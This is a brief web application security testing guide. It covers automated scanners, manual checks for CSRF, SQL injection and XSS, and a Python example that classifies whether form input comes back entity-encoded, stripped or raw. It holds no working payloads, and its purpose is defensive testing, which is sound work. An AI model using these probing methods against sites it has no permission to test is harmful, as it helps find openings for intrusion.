Tool Scanning
Currently, web security scanners are mature in detecting XSS, SQL injection, open redirect, and PHP file inclusion vulnerabilities.
Commercial web security scanners include IBM Rational AppScan, WebInspect, and Acunetix WVS.
Free scanners include w3af, Skipfish, and others.
Depending on the budget available, you can purchase commercial scanning software or use free software; each has its own advantages.
First, use the tool to scan the whole website. Once the scan confirms that there are no vulnerabilities, or the vulnerabilities it found have been fixed, proceed to the manual checks below.
Manual Detection
For CSRF, unauthorized access, file upload, password modification, and similar vulnerabilities, automatic detection is difficult because these issues involve system or business logic, and a human sometimes has to take part in the page flow. Manual testing is therefore required to detect such vulnerabilities.
Manually check whether the website URLs and the back-end login page are vulnerable to SQL injection.
XSS: For URLs reached by GET requests, vulnerability scanning software can scan for XSS. (The software is not perfect, however; it produces false positives and misses some cases.)
For POST requests (message boards, comment forms, and so on), the test has to be done by entering the test strings into the input box and checking how they are reflected in the response:
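As an added example (not code from the original article), the following Python check classifies how the HTML metacharacters typed into a POST form come back in the server's response: entity-encoded, stripped, or raw, and which characters survived unencoded. The marker strings, sample responses and function names are constructed for this illustration.

```python
import html
import re

# Constructed probe: unique markers bracket the metacharacters that the manual
# POST-form test types into an input box (hypothetical marker values).
PREFIX, SUFFIX = "zq1", "1qz"
METACHARS = '<>"\'&'
PROBE = PREFIX + METACHARS + SUFFIX

# A well-formed HTML entity such as &lt; &#39; &#x27; &amp;
ENTITY_RE = re.compile(r"&(?:#\d+|#[xX][0-9a-fA-F]+|[A-Za-z][A-Za-z0-9]*);")


def analyze_reflection(body: str) -> str:
    """Report how the probe came back in one response body.

    'absent'      - markers not found (input is not echoed on this page)
    'encoded'     - every metacharacter came back as an HTML entity
    'stripped'    - reflected, but some metacharacters were removed or changed
    'raw:<chars>' - these metacharacters came back unencoded (needs follow-up)
    """
    m = re.search(re.escape(PREFIX) + "(.*?)" + re.escape(SUFFIX), body, re.S)
    if not m:
        return "absent"
    segment = m.group(1)
    # Drop well-formed entities first so the '&' of '&lt;' is not counted as raw.
    leftover = ENTITY_RE.sub("", segment)
    unencoded = [c for c in METACHARS if c in leftover]
    if unencoded:
        return "raw:" + "".join(unencoded)
    # Decoding the entities must give back exactly what was submitted.
    return "encoded" if html.unescape(segment) == METACHARS else "stripped"


# Constructed sample responses standing in for four comment-form behaviours.
SAMPLE_RESPONSES = {
    "escaped_text": "<p>Comment: zq1&lt;&gt;&quot;&#39;&amp;1qz</p>",
    "unescaped_text": "<p>Comment: zq1<>\"'&1qz</p>",
    # Angle brackets encoded, but quotes left raw inside a quoted attribute.
    "quoted_attribute": "<input name=\"c\" value=\"zq1&lt;&gt;\"'&amp;1qz\">",
    "filtered": "<p>Comment: zq11qz</p>",
}


def audit(responses: dict) -> dict:
    """Run the classifier over a set of named response bodies."""
    return {name: analyze_reflection(body) for name, body in responses.items()}


if __name__ == "__main__":
    for name, result in audit(SAMPLE_RESPONSES).items():
        print(f"{name}: {result}")
```

The `quoted_attribute` case shows why a single yes/no from a scanner is not enough: the brackets are encoded, yet the raw double quote still lets the value break out of the attribute.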